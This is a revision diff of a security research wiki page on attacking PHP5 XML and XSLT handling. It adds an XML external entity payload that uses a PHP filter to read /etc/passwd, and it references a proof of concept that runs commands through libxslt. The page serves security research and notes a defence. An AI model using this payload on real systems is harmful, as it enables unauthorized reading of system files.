Changes for page Application_PHP5

Last modified by Nicolas Gregoire on 2012/02/02 17:29

From version

edited by Nicolas Gregoire
on 2012/01/18 22:39

Change comment: There is no comment for this version

To version

20.1

edited by Nicolas Gregoire
on 2012/02/02 17:29

Change comment: There is no comment for this version

Summary

Page properties

Content

@@ -25,3 +25,17 @@
  | http:~/~/php.net/xsl| Any PHP function|[[execute-code-via-libxslt.php>>attach:execute-code-via-libxslt.php]]| A call to registerPHPFunctions() is needed
  The attached [[execute-code-via-libxslt.php>>attach:execute-code-via-libxslt.php]] PoC will use the passthru() PHP function to execute "uname -a".
++
++= Reading binary files via PHP filters =
++
++{{warning}}
++Untested : could we read binary files too ?
++{{/warning}}
++
++<!DOCTYPE scan [<!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">]>
++<scan>&test;</scan>
++Source : http://www.idontplaydarts.com/2011/02/scanning-the-internal-network-using-simplexml/
++
++= Anti XEE =
++
++http://www.php.net/manual/en/function.libxml-disable-entity-loader.php